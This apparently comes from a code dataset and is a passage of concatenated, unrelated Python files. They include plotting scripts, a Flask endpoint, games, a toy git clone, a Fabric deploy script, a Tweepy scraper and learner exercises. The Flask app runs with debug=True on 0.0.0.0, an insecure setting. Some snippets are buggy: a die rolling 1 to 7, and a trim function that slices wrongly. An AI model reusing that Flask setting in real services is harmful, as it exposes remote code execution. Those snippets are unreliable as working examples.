plt.ylim(0,np.sqrt(rN[len(rN)-1])+2)\nplt.legend(loc='best')\nplt.tight_layout()\nplt.grid()\n\nplt.savefig('build/Aufg_1_b.pdf')\n","sub_path":"loesung/Übung1/Aufg_1.py","file_name":"Aufg_1.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"618267397","text":"# coding=utf-8\nfrom flask import Flask\nfrom src.kde import pipeline\nfrom concurrent.futures import ThreadPoolExecutor\nfrom flask import request\nexecutor = ThreadPoolExecutor(1)\napp = Flask(__name__)\n\n\n# 第一个路由实现增量更新 \\v1\\?start=&end=\n@app.route('/v1/')\ndef genroadnet():\n start = request.args.get(\"start\")\n end = request.args.get(\"end\")\n executor.submit(pipeline.runUpdateData2Map,start,end)\n return 'Function is running is backend.'\n\nif __name__ == '__main__':\n # http://127.0.0.1:5000/v1/\n # 系统监听所有公网 IP\n # 交互式调试器在生产中应该设置为 debug=false\n app.run(host='0.0.0.0',debug=True)","sub_path":"src/app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"234543636","text":"from random import *\nimport time\nwhile True:\n perm = input(\"\\nWould you like to roll the dice? Y/N \\n\")\n if perm == \"N\" or perm == \"n\":\n break\n else:\n print(\"\\nYou rolled a...\")\n roll = str(randint(1, 7))\n for i in range(0, int(roll)):\n print(\"...\")\n time.sleep(1)\n print(roll + \"!\")\n","sub_path":"Unit1_DiceRoll.py","file_name":"Unit1_DiceRoll.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"382525552","text":"# coding: utf8\r\nimport os\r\nimport pathlib\r\nimport typing as tp\r\n\r\ndef repo_find(workdir: tp.Union[str, pathlib.Path] = \".\") -> pathlib.Path:\r\n if 'GIT_DIR' not in os.environ:\r\n gitname = pathlib.Path('.git')\r\n else:\r\n gitname = pathlib.Path(os.environ['GIT_DIR'])\r\n while os.path.isdir(workdir):\r\n if os.path.isdir(workdir / pathlib.Path(gitname)):\r\n return workdir / gitname\r\n if workdir == '.':\r\n break\r\n workdir = pathlib.Path(os.path.dirname(workdir))\r\n raise AssertionError('Not a git repository')\r\n\r\n\r\ndef repo_create(workdir: tp.Union[str, pathlib.Path]) -> pathlib.Path:\r\n if os.path.isfile(workdir):\r\n raise AssertionError(f'{workdir} is not a directory')\r\n if 'GIT_DIR' not in os.environ:\r\n gitdir = workdir / pathlib.Path('.git')\r\n else:\r\n gitdir = workdir / pathlib.Path(os.environ['GIT_DIR'])\r\n os.mkdir(gitdir)\r\n os.makedirs(gitdir / \"refs\" / \"heads\")\r\n os.mkdir(gitdir / \"refs\" / \"tags\")\r\n os.mkdir(gitdir / \"objects\")\r\n pathlib.Path(gitdir / \"HEAD\").touch()\r\n pathlib.Path(gitdir / \"config\").touch()\r\n pathlib.Path(gitdir / \"description\").touch()\r\n current_file = open(gitdir / \"HEAD\", \"w\")\r\n current_file.write(\"ref: refs/heads/master\\n\")\r\n current_file.close()\r\n current_file = open(gitdir / \"config\", \"w\")\r\n current_file.write(\"[core]\\n\\trepositoryformatversion = 0\\n\\tfilemode = true\\n\\tbare = false\\n\\tlogallrefupdates = false\\n\")\r\n current_file.close()\r\n current_file = open(gitdir / \"description\", \"w\")\r\n current_file.write(\"Unnamed pyvcs repository.\\n\")\r\n current_file.close()\r\n return gitdir","sub_path":"homework04/pyvcs/repo.py","file_name":"repo.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"59553417","text":"# 练习2:[\"无忌\",\"赵敏\",\"周芷若\"] [101,102,103]\n# {\"无忌\":101,\"赵敏\":102,\"周芷若\":103}\n# 10:18\nlist01 = [\"无忌\", \"赵敏\", \"周芷若\"]\nlist02 = [101, 101, 103]\ndict01 = {}\n# 通过索引同时在多个列表中获取元素\nfor i in range(len(list01)):\n # key = list01[i]\n # value = list02[i]\n # dict01[key] = value\n dict01[list01[i]] = list02[i]\n\nprint(dict01)\n# 11:00\n# 需求:字典如何根据value查找key\n# 解决方案1:键值互换\ndict02 = {value: key for key, value in dict01.items()}\nprint(dict02)\nprint(dict02[101])\n# 缺点:如果key重复,交换或则丢失数据。\n# 如果需要保持所有数据\n# [(k,v),]\nlist02 = [(value, key) for key, value in dict01.items()]\nprint(list02)\n","sub_path":"python_one_learn/day07/exercise02.py","file_name":"exercise02.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"308669543","text":"#!/usr/bin/python\n\nimport sys\nimport numpy as np\nfrom numpy import vectorize # https://stackoverflow.com/questions/8036878/function-of-numpy-array-with-if-statement\nimport matplotlib.pyplot as plt\n\n# https://docs.scipy.org/doc/scipy/reference/generated/scipy.special.betainc.html\nimport scipy.special as sc\n\n# # define constants (for SFA)\n# k = 0.3\n# C1 = 0.55\n# rho = 1.3 # target density\n# delta_i = 4. # impactor density\n# n1 = 1.2\n# n2 = 1.\n# p = 0.3\n# mu = 0.4\n# nu = 0.4\n\n# define constants (for WCB, Weakly Cemented Basalt)\nk = 0.3\nC1 = 0.18\nrho = 1.3 # target density\ndelta_i = 4. # impactor density\nn1 = 1.2\nn2 = 1.\np = 0.3\nmu = 0.46\nnu = 0.4\n\ndef Etotej(x, delta):\n\t#return 9.*k*C1**2/(8.*np.pi) * (rho/delta)**(-2.*nu/mu+1) * (x/n1)**(2/mu-3.) * sc.betainc(2.*p + 1, -2./mu + 3, 1.-x)\n\treturn 9.*k*C1**2/(8.*np.pi) * (rho/delta)**(-2.*nu/mu+1) * (x/n1)**(2/mu-3.) * (1.-x)**(2.*p+1.) * sc.hyp2f1(2.*p + 1, 2./mu - 2, 2.*p + 2, 1.-x) / (2.*p+1.) / 0.5\n\n\nx = np.logspace(-5, 0, 1000)\n\n\ndelta_i = np.linspace(0.5, 5., 10)\n\nfor d_i in delta_i:\n\tplt.plot(x, Etotej(x, d_i), label=r\"$\\delta =$ \" + f\"{d_i:.1f}\")\nplt.grid(b=True, which='both') # https://stackoverflow.com/questions/9127434/how-to-create-major-and-minor-gridlines-with-different-linestyles-in-python\n\nplt.title(\"Lunar Regolith Target (weakly cemented basalt)\\n\" r\"Regolith Bulk Density $\\rho = $\" + f\"{rho:.1f}\" +r\" g/cc, Impactor Density $\\delta$\")\nplt.xlabel(r\"Effective Impactor to Crater Radius $\\frac{n_1 a}{n_2 R}$\", fontsize=14)\nplt.ylabel(r\"Total Ejecta Kinetic Energy $E_{tot,ej} / E_{imp}$\", fontsize=14)\nplt.legend()\nplt.savefig('TotalEjectaKE_vs_EffectiveCraterSize_3.png', bbox_inches='tight', dpi=600)\nplt.show()","sub_path":"LaTeX_ReportV2/plot_Etotej.py","file_name":"plot_Etotej.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"106147867","text":"import pygame\nimport sys\nimport config as c\nfrom collections import defaultdict\n\n\nclass GameEngine:\n def __init__(self, caption, width, height, back_image_filename, frame_rate):\n self.width = width\n self.height = height\n self.frame_rate = frame_rate\n self.game_over = False\n self.play = False\n self.objects = c.objects\n self.menu_objects = []\n self.player = None\n self.game_camera = None\n\n pygame.init()\n pygame.font.init()\n self.surface = pygame.display.set_mode((width, height))\n # self.surface = pygame.display.set_mode((width, height), pygame.HWSURFACE | pygame.DOUBLEBUF | pygame.FULLSCREEN)\n\n pygame.display.set_caption(caption)\n\n # self.background_image = pygame.image.load(back_image_filename)\n\n self.background_image = pygame.Surface((width, height)) # Создание видимой поверхности\n self.background_image.fill(pygame.Color(\"#004400\"))\n '''self.background_image = pygame.Surface((width, height)) # Создание видимой поверхности\n self.background_image.fill(pygame.Color(\"#004400\"))'''\n ####\n\n self.clock = pygame.time.Clock()\n self.keydown_handlers = defaultdict(list)\n self.keyup_handlers = defaultdict(list)\n self.mouse_handlers = []\n#########\n def camera(self):\n x = self.player.player.x\n y = self.player.player.y\n x, y = -x + self.width / 2, -y + self.height / 2\n\n x = min(0, x) # Не движемся дальше левой границы\n x = max(-(self.game_camera.width - self.width), x) # Не движемся дальше правой границы\n y = max(-(self.game_camera.height - self.height), y) # Не движемся дальше нижней границы\n y = min(0, y) # Не движемся дальше верхней границы\n self.game_camera.x = x\n self.game_camera.y = y\n\n def update(self):\n if self.play:\n for o in self.objects:\n o.update()\n else:\n for o in self.menu_objects:\n o.update()\n\n def draw(self):\n if self.play:\n for o in self.objects:\n o.draw(self.surface, self.game_camera.topleft)\n else:\n for o in self.menu_objects:\n o.draw(self.surface)\n\n def handle_events(self):\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYDOWN:\n for handler in self.keydown_handlers[event.key]:\n handler(event.key)\n elif event.type == pygame.KEYUP:\n for handler in self.keyup_handlers[event.key]:\n handler(event.key)\n elif event.type in (pygame.MOUSEBUTTONDOWN, pygame.MOUSEBUTTONUP, pygame.MOUSEMOTION):\n for handler in self.mouse_handlers:\n handler(event.type, event.pos)\n\n def run(self):\n while not self.game_over:\n self.surface.blit(self.background_image, (0, 0))\n\n self.handle_events()\n self.update()\n\n if self.play:\n self.camera()\n\n self.draw()\n\n pygame.display.update()\n self.clock.tick(self.frame_rate)\n","sub_path":"game_engine.py","file_name":"game_engine.py","file_ext":"py","file_size_in_byte":3442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"572823357","text":"import PIL.Image\nimport PIL.ImageTk\nfrom dbInterface import *\nimport camera\n\nfrom login import Login\n\n\nclass App:\n def __init__(self, debug):\n self.debug = debug\n\n self.root = None\n self.main_window = None\n\n self.user = None\n\n self.db_interface = None\n self.login = None\n\n # Request login credentials from user\n self.login_user()\n\n self.create_main()\n\n def login_user(self):\n self.login = Login(self.debug)\n\n self.db_interface = DbInterface(self.login.username, self.login.password, self.debug)\n\n self.user = self.db_interface.get_user()\n\n def quit(self):\n self.root.destroy()\n sys.exit()\n\n def create_main(self):\n self.root = tk.Tk()\n self.root.withdraw()\n\n self.main_window = Toplevel()\n self.main_window.configure(background=StandardValues.background)\n self.main_window.protocol('WM_DELETE_WINDOW', self.quit)\n\n StandardValues.get_screen_position(self.root)\n self.main_window.geometry(\"+{}+{}\".format(StandardValues.scr_width, StandardValues.scr_height))\n\n # SET GUI FRAMES\n top_frame = Frame(self.main_window)\n bottom_frame = Frame(self.main_window)\n bottom_frame.configure(background=\"black\")\n top_frame.pack(side=TOP)\n bottom_frame.pack(side=BOTTOM, fill=BOTH, expand=True)\n\n bottom_frame_left = Frame(bottom_frame)\n bottom_frame_right = Frame(bottom_frame)\n\n bottom_frame_left.configure(background=\"black\")\n bottom_frame_right.configure(background=\"black\")\n\n bottom_frame_left.pack(side=LEFT, fill=BOTH, expand=True)\n bottom_frame_right.pack(side=RIGHT, fill=BOTH, expand=True)\n\n # Welcome label\n welcome_lbl = Label(top_frame, bg=\"white\",\n text=\"Welcome \" + self.user.passport.firstName + \"\\nYou are logged in under \"\n + self.user.passport.loginName + \" as \" + self.user.passport.access)\n welcome_lbl.pack(side=BOTTOM, padx=10, pady=10)\n\n # ADD bANNER PICTURE\n path = \"../img/carpic.png\"\n img = PIL.ImageTk.PhotoImage(PIL.Image.open(path))\n panel = tk.Label(self.main_window, image=img)\n panel.pack(in_=top_frame, side=TOP, expand=\"no\")\n\n # set user type\n user_type = DISABLED\n if self.user.passport.access == \"ADMIN\":\n user_type = NORMAL\n\n # set main window properties\n self.main_window.winfo_toplevel().title(\"License Recognition Program\")\n # create all buttons\n\n add_driver_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Add New Driver\",\n command=lambda: self.db_interface.add_drivers_screen())\n\n edit_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n state=user_type,\n text=\"Edit Driver\",\n command=lambda: [self.db_interface.edit_driver_search()])\n\n delete_btn = Button(bottom_frame_left,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n state=user_type,\n text=\"Delete Driver\",\n command=lambda: [self.db_interface.del_driver_screen()])\n\n search_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Search Drivers\",\n command=lambda: [self.db_interface.search_drivers()])\n\n scan_plate_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Scan Plate\",\n command=lambda: [self.db_interface.scan_license_plate_screen()])\n\n logout_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Log Out\",\n command=lambda: [self.db_interface.log_out_screen(self)])\n\n webcam_btn = Button(bottom_frame_right,\n bg=StandardValues.btn_bk_clr,\n fg=StandardValues.btn_text_clr,\n width=StandardValues.button_width,\n text=\"Start Webcam\",\n command=lambda: [camera.start_stream()])\n\n # Set driver\n add_driver_btn.pack()\n\n # Adds line seperator\n seperator = Frame(height=2, bd=1, relief=SUNKEN)\n seperator.pack(fill=X, padx=50, pady=50)\n\n # set bottom part buttons\n add_driver_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n delete_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n edit_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n search_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n scan_plate_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n logout_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n webcam_btn.pack(side=TOP, padx=StandardValues.padx, pady=StandardValues.pady)\n\n self.main_window.mainloop()\n\n\ndef main():\n app = App(0)\n print(\"In use by \" + app.login.username)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/app/PlateRecMain.py","file_name":"PlateRecMain.py","file_ext":"py","file_size_in_byte":6224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"564536369","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.views.generic import CreateView\nfrom django.views.generic import ListView\n\nfrom common.utils import split_tags\nfrom posts.forms import PostForm\nfrom posts.models import Post, Tag\n\n\nclass PostList(ListView):\n model = Post\n context_object_name = 'posts'\n paginate_by = 10\n\n\nclass PostCreate(LoginRequiredMixin, CreateView):\n model = Post\n form_class = PostForm\n success_url = reverse_lazy('posts:list')\n\n def form_valid(self, form):\n author = self.request.user\n title = form.cleaned_data['title']\n content = form.cleaned_data['content']\n tags_text = form.cleaned_data['tags']\n\n tag_names = split_tags(tags_text)\n tags = []\n for tag_name in tag_names:\n try:\n tag = Tag.objects.get(name=tag_name)\n except Tag.DoesNotExist:\n tag = Tag.objects.create(name=tag_name)\n tag.save()\n tags.append(tag)\n\n Post.objects.create(\n author=author, title=title, content=content, tags=tags)\n super(CreateView, self).form_valid(form)\n","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"205619804","text":"#!/usr/bin/python3\n\"\"\"Module that contains do_pack, do_deploy and deploy functions.\"\"\"\nfrom fabric.api import local, env, put, run\nfrom time import strftime\nimport os.path\nenv.hosts = ['54.160.217.25', '3.87.244.249']\n\n\ndef do_pack():\n \"\"\"Generate .tgz archive of web_static/ folder.\"\"\"\n timenow = strftime(\"%Y%M%d%H%M%S\")\n try:\n local(\"mkdir -p versions\")\n f_name = \"versions/web_static_{}.tgz\".format(timenow)\n local(\"tar -cvzf {} web_static/\".format(f_name))\n return f_name\n except:\n return None\n\n\ndef do_deploy(archive_path):\n \"\"\"Distributes archive to my web servers.\"\"\"\n if os.path.isfile(archive_path) is False:\n return False\n try:\n f_name = archive_path.split(\"/\")[-1]\n no_ext = f_name.split(\".\")[0]\n path_no_ext = \"/data/web_static/releases/{}/\".format(no_ext)\n symlink = \"/data/web_static/current\"\n put(archive_path, \"/tmp/\")\n run(\"mkdir -p {}\".format(path_no_ext))\n run(\"tar -xzf /tmp/{} -C {}\".format(f_name, path_no_ext))\n run(\"rm /tmp/{}\".format(f_name))\n run(\"mv {}web_static/* {}\".format(path_no_ext, path_no_ext))\n run(\"rm -rf {}web_static\".format(path_no_ext))\n run(\"rm -rf {}\".format(symlink))\n run(\"ln -s {} {}\".format(path_no_ext, symlink))\n return True\n except:\n return False\n\n\ndef deploy():\n \"\"\"Creates and distributes an archive.\"\"\"\n archive_path = do_pack()\n if archive_path is None:\n return False\n success = do_deploy(archive_path)\n return success\n","sub_path":"3-deploy_web_static.py","file_name":"3-deploy_web_static.py","file_ext":"py","file_size_in_byte":1560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"310828487","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n__author__ = 'MFC'\n__time__ = '2019-06-26 17:21'\n\n\"\"\"\ntype()传入3个参数时,用来创建一个类\n\"\"\"\n\nClassVariable = type('ClassA', (object,), dict(name=\"type test\"))\na = ClassVariable()\nprint(type(a))\nprint(a.name)\n\nclass ClassB:\n name = \"type test\"\n\nb = ClassB()\nprint(type(b))\nprint(b.name)","sub_path":"design_pattern/class_demo/demo_c2.py","file_name":"demo_c2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"292938965","text":"import time\n\n\ndef hangman():\n\n # message variables\n already_guessed_message = \"You already guessed this letter.\"\n guessed_letters_message = \"Guessed letters:\"\n progress_message = \"Type anything to continue or type 'end' to quit\"\n play_again_message = \"To start a new game, press Y/y\"\n win_message = \"Congratulations! You have guessed the word.\"\n\n # starting and getting a word to be guessed\n print(\"The game is starting...\")\n time.sleep(1)\n print(\"Type a word to start the game: \")\n guess_word = input()\n guess_word = guess_word.lower()\n\n # checking if word doesn't have blank lines or is longer than 2 characters\n if \" \" in guess_word:\n print(\"It has to be just one word!\")\n time.sleep(1)\n hangman()\n elif len(guess_word) < 3:\n print(\"The word is too short!\")\n time.sleep(1)\n hangman()\n else:\n time.sleep(1)\n print(\"You can start guessing now.\")\n\n # creating identical lists, one will be shown to the player and the second one not\n # appending letters in normal list and stars to the fake one\n # creating variables for lives and list for guessed letters\n word_list = []\n fake_word_list = []\n for i in guess_word:\n word_list.append(i)\n fake_word_list.append(\"*\")\n time.sleep(1)\n fake_word_string = \"\".join(fake_word_list)\n print(fake_word_string)\n\n lives = 5\n guessed_letters = []\n\n # while loop to run the game\n while True:\n # guessing letter\n print(\"Take a guess: \")\n guess = input()\n if len(guess) == 2:\n print(\"Guess a single letter or a word with 3 or more characters!\")\n time.sleep(1)\n print(\"Take a guess: \")\n guess = input()\n guess = guess.lower()\n\n # checking if letter is the word\n if guess in word_list:\n time.sleep(1)\n guessed_letters.append(guess) # appends letters which have been guessed\n print(\"This letter is in the word.\")\n for i in range(int(len(guess_word))):\n if guess == fake_word_list[i]: # if the letter is already in the fake list, it has been guessed\n print(already_guessed_message)\n guessed_letters.pop() # popping the letter, because i don't want it multiple times\n print(guessed_letters_message, guessed_letters)\n elif guess == word_list[i]:\n fake_word_list[i] = guess # letter is correct and not guessed yet\n fake_word_string = \"\".join(fake_word_list)\n print(fake_word_string)\n print(progress_message)\n\n # you can input a whole word, checking if it is correct\n elif guess == guess_word:\n time.sleep(1)\n print(win_message)\n time.sleep(1)\n print(play_again_message)\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n\n # checking if guess is incorrect and not guessed yet\n elif guess not in word_list and guess not in guessed_letters:\n guessed_letters.append(guess)\n lives -= 1\n if lives == 1:\n time.sleep(1)\n print(\"You lost a life! You have %d life left\" % lives)\n elif lives == 0:\n time.sleep(1)\n print(\"You are dead, to start a new game pres Y/y\")\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n else:\n time.sleep(1)\n print(\"You lost a life! You have %d lives left\" % lives)\n print(progress_message)\n\n # checking if guess is incorrect but already guessed\n elif guess not in word_list and guess in guessed_letters:\n time.sleep(1)\n print(already_guessed_message)\n print(guessed_letters_message, guessed_letters)\n print(progress_message)\n\n # checking if both initial lists are the same, it means victory\n if word_list == fake_word_list:\n time.sleep(1)\n print(win_message)\n time.sleep(1)\n print(play_again_message)\n answer = input()\n if answer == \"Y\" or answer == \"y\":\n hangman()\n else:\n quit()\n if input() == \"end\":\n quit()\n\n\nhangman()\n","sub_path":"Other/Python Scripts/hangman.py","file_name":"hangman.py","file_ext":"py","file_size_in_byte":4553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"357910923","text":"#split\n\nL=['A','B','C','D']\nr=[]\nn=3\nfor i in range(n):\n r.append(L[i])\nprint(r)\n#using split\nprint(L[0:3])\n\nList=list(range(200))\nprint(\"取前20 间隔为2\")\nprint(List[0:20:2])\n\nb='i am ok!'\nprint(b[0:4])\n\n#to cut off the blank in the head and tear of the string \ndef trim(s):\n if s=='':\n return s\n if s[0]==' ':\n return trim(s[1:])\n elif s[-1]==' ':\n return trim(s[:-2])\n else :\n return s\nif trim('hello ') != 'hello':\n print('测试失败!')\nelif trim(' hello') != 'hello':\n print('测试失败!')\nelif trim(' hello ') != 'hello':\n print('测试失败!')\nelif trim(' hello world ') != 'hello world':\n print('测试失败!')\nelif trim('') != '':\n print('测试失败!')\nelif trim(' ') != '':\n print('测试失败!')\nelse:\n print('测试成功!')\ndef interator(s):\n for i,value in enumerate(s):\n print(i,value)\n\ninterator(\"hello,world!\")\n\ndef findMinAndMax(s):\n if s==[]:\n return (None,None)\n else :\n max=s[0]\n min=s[0]\n for i in s:\n if i>=max:\n max=i\n if i<=min:\n min=i\n return (min,max)\n\nif findMinAndMax([]) != (None, None):\n print('测试失败!')\nelif findMinAndMax([7]) != (7, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1]) != (1, 7):\n print('测试失败!')\nelif findMinAndMax([7, 1, 3, 9, 5]) != (1, 9):\n print('测试失败!')\nelse:\n print('测试成功!')\n\n#list producer\nL1 = ['Hello', 'World', 18, 'Apple', None]\nL2=[ i.lower() for i in L1 if isinstance(i,str)]\nprint(L2)\n\n#要理解generator的工作原理,它是在for循环的过程中不断计算出下一个元素,\n#并在适当的条件结束for循环。对于函数改成的generator来说,\n#遇到return语句或者执行到函数体最后一行语句,\n#就是结束generator的指令,for循环随之结束。\n#triangles\ndef triangles():\n L=[1]\n while True:\n yield L\n L=[1]+[L[x]+L[x+1] for x in range(len(L)-1)]+[1]\n \n \nn = 0\nresults = []\nfor t in triangles():\n print(t)\n results.append(t)\n n = n + 1\n if n == 10:\n break\nprint(results)\nif results == [\n [1],\n [1, 1],\n [1, 2, 1],\n [1, 3, 3, 1],\n [1, 4, 6, 4, 1],\n [1, 5, 10, 10, 5, 1],\n [1, 6, 15, 20, 15, 6, 1],\n [1, 7, 21, 35, 35, 21, 7, 1],\n [1, 8, 28, 56, 70, 56, 28, 8, 1],\n [1, 9, 36, 84, 126, 126, 84, 36, 9, 1]\n]:\n print('测试通过!')\nelse:\n print('测试失败!')\n","sub_path":"spiltTest.py","file_name":"spiltTest.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"584139448","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 18 15:51:29 2018\n\n@author: rcarns\n\"\"\"\n\n\n\ndef RetrieveTweets(searchQuery,storagefile,maxTweets=10000):\n # the below code draws from \n # https://stackoverflow.com/questions/38555191/get-all-twitter-mentions-using-tweepy-for-users-with-millions-of-followers\n\n import tweepy\n import pandas as pd\n import numpy as np\n import pickle\n from connections import twitterapi\n api = twitterapi()\n \n tweetsPerQry = 100\n sinceId = None\n\n \n\n max_id = -1\n\n tweetCount = 0\n tweetProgress = 0\n #fName = 'tweetlist.txt'\n #with open(fName, 'w') as fname:\n list_of_tweets = []\n while tweetCount < maxTweets:\n try:\n if (max_id <= 0):\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry, tweet_mode='extended')\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n since_id=sinceId)\n else:\n if (not sinceId):\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),tweet_mode='extended')\n else:\n new_tweets = api.search(q=searchQuery, count=tweetsPerQry,\n max_id=str(max_id - 1),\n since_id=sinceId)\n if not new_tweets:\n print(\"No more tweets found\")\n break\n for tweet in new_tweets:\n #print(tweet.created_at.strftime('%x %X')+' '+tweet.full_text)\n list_of_tweets.append(tweet._json)\n tweetCount += len(new_tweets)\n if tweetCount//1000>tweetProgress:\n print(\"Downloaded {0} tweets\".format(tweetCount))\n tweetProgress+=1\n max_id = new_tweets[-1].id\n except tweepy.TweepError as e:\n # Just exit if any error\n print(\"some error : \" + str(e))\n break\n\n picklefile = open(storagefile,'wb')\n pickle.dump(list_of_tweets,picklefile)\n picklefile.close()\n return tweetCount\n\ndef GetTestSet(atuser,maxtweets):\n import pickle\n import pandas as pd\n #maxtweets = 250\n if not atuser[0]=='@':\n username = atuser\n atuser = '@'+ atuser\n elif atuser[0]=='@':\n username = atuser[1:]\n import time\n retweet_filter='-filter:retweets'\n reply_filter = '-filter:replies'\n searchQuery = atuser+' AND '+retweet_filter+' AND '+reply_filter# + 'AND until:2018-09-11'\n print(searchQuery)\n #storagefile = type+'tweets'+time.strftime(\"%Y%m%d-%H%M%S\")+'.dat'\n storagefile = 'testtweetfile.dat'\n tweetCount = RetrieveTweets(searchQuery,storagefile,maxtweets)\n maxtweets = tweetCount\n #import shutil\n #shutil.copy(storagefile,type+'tweets.dat')\n \n testpickle = open('testtweetfile.dat','rb')\n testtweets = pickle.load(testpickle)\n testpickle.close()\n testfilename = username+'test_tweets.csv'\n columns=['text','mentions','choose_one','class_label']\n testframe = pd.DataFrame(columns=columns,index=range(len(testtweets)))\n i = 0\n \n for tweet in testtweets:\n tweettext = tweet['full_text']\n testframe.at[i,'text']=tweettext\n testframe.at[i,'mentions'] = tweet['entities']['user_mentions']\n testframe.at[i,'choose_one']=''\n testframe.at[i,'class_label']=2\n i+=1\n \n testframe.to_csv(testfilename)\n return testfilename","sub_path":"squeakywheel/gettesttweets.py","file_name":"gettesttweets.py","file_ext":"py","file_size_in_byte":3750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358838017","text":"# 115. 不同的子序列\n# 给定一个字符串 s 和一个字符串 t ,计算在 s 的子序列中 t 出现的个数。\n# 字符串的一个 子序列 是指,通过删除一些(也可以不删除)字符且不干扰剩余字符相对位置所组成的新字符串。(例如,\"ACE\"是\"ABCDE\"的一个子序列,而\"AEC\"不是)\n# 题目数据保证答案符合 32 位带符号整数范围\n# 来源:力扣(LeetCode)\n# 链接:https://leetcode-cn.com/problems/distinct-subsequences\n# 示例1:\n# 输入:s = \"rabbbit\", t = \"rabbit\"\n# 输出:3\n# 解释:\n# 如下图所示, 有 3 种可以从 s 中得到 \"rabbit\" 的方案。\n# (上箭头符号 ^ 表示选取的字母)\n# rabbbit\n# ^^^^ ^^\n# rabbbit\n# ^^ ^^^^\n# rabbbit\n# ^^^ ^^^\nclass Solution:\n def numDistinct(self, s: str, t: str) -> int:\n # 1 t 是 s 的子序列 t的长度小于s的长度\n # 动态规划\n # t[i] == s[j] dp[i][j] = dp[i+1][j+1] + dp[i+1][j]\n # t[i] != s[j] dp[i][j] = dp[i+1][j]\n m, n = len(s), len(t)\n if m < n:\n return 0\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n # 当 j = n 时, t[j:]为空字符串,是任何子字符串的子序列,因此dp[i][n] = 1\n for i in range(m + 1):\n dp[i][n] = 1\n for i in range(m - 1, -1, -1):\n for j in range(n - 1, -1, -1):\n if s[i] == t[j]:\n dp[i][j] = dp[i + 1][j + 1] + dp[i + 1][j]\n else:\n dp[i][j] = dp[i + 1][j]\n return dp[0][0]\n","sub_path":"Hard/numDistinct.py","file_name":"numDistinct.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"527950590","text":"#!/usr/bin/env python3\n#\n# Copyright (c) 2021, The OpenThread Authors.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of the copyright holder nor the\n# names of its contributors may be used to endorse or promote products\n# derived from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR 